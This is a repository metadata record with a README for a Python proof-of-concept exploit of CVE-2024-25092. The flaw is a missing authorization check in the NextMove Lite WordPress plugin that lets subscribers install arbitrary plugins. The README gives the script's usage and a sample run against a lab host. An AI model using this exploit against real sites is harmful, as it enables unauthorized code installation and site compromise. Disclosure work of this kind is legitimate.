{"id":21125714,"url":"https://github.com/randomrobbiebf/cve-2024-25092","last_synced_at":"2025-03-14T11:41:29.969Z","repository":{"id":222471309,"uuid":"757380747","full_name":"RandomRobbieBF/CVE-2024-25092","owner":"RandomRobbieBF","description":"NextMove Lite \u003c 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation","archived":false,"fork":false,"pushed_at":"2024-02-14T11:32:33.000Z","size":5,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T05:41:43.408Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/RandomRobbieBF.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2024-02-14T11:30:59.000Z","updated_at":"2024-07-11T16:39:09.000Z","dependencies_parsed_at":"2024-02-14T12:51:08.737Z","dependency_job_id":null,"html_url":"https://github.com/RandomRobbieBF/CVE-2024-25092","commit_stats":null,"previous_names":["randomrobbiebf/cve-2024-25092"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-25092","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-25092/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-25092/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/RandomRobbieBF%2FCVE-2024-25092/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/RandomRobbieBF","download_url":"https://codeload.github.com/RandomRobbieBF/CVE-2024-25092/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243573166,"owners_count":20312879,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-20T04:36:30.952Z","updated_at":"2025-03-14T11:41:29.946Z","avatar_url":"https://github.com/RandomRobbieBF.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# CVE-2024-25092\nNextMove Lite \u0026lt; 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation\n\n\n## Description:\nThe NextMove Lite – Thank You Page for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'xl_addon_installation' function in all versions up to, and including, 2.17.0. This makes it possible for authenticated attackers, with subscriber access and above, to install and activate arbitrary plugins.\n\n```\nSeverity: medium\nCVE ID: CVE-2024-25092\nCVSS Score: 6.5\nCVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\nPlugin Slug: woo-thank-you-page-nextmove-lite\nWPScan URL: https://www.wpscan.com/plugin/woo-thank-you-page-nextmove-lite\nReference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/0b04ab77-880b-423a-bba6-59822f0463bc?source=api-prod\n```\n\nHow to use\n---\n\n```\nusage: CVE-2024-25092.py [-h] --url URL --username USERNAME --password PASSWORD --slug SLUG --php PHP\n\nNextMove Lite – \u003c= 2.17.0 - Missing Authorization to Authenticated(Subscriber+) Plugin Activation Description CVE-2024-25092 - The NextMove Lite – Thank You Page for WooCommerce plugin\nfor WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'xl_addon_installation' function in all versions up to, and including, 2.17.0.\nThis makes it possible for authenticated attackers, with subscriber access and above, to install and activate arbitrary plugins.\n\noptions:\n  -h, --help           show this help message and exit\n  --url URL            URL of the WordPress site\n  --username USERNAME  WordPress username\n  --password PASSWORD  WordPress password\n  --slug SLUG          WordPress Plugin Slug\n  --php PHP            WordPress Plugin PHP file\n```\n\nPOC\n---\n\nNot been able to activate for some reason.\n\n```\npython3 CVE-2024-25092.py --url http://wordpress.lan --user user --password useruser1 --slug ai-assistant-by-10web --php ai-assistant-by-10web/ai-assistant-by-10web.php\nLogged in successfully.\nGetting REST API Nonce!\nNonce Found: 905413f8f8\nInstalling Plugin\nDownloading installation package from https://downloads.wordpress.org/plugin/ai-assistant-by-10web.1.0.19.zip\nUnpacking the package\nInstalling the plugin\nPlugin installed successfully.\n{\"success\":false,\"data\":\"Failed to activate plugin.\"}\n```\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-25092","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frandomrobbiebf%2Fcve-2024-25092","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frandomrobbiebf%2Fcve-2024-25092/lists"}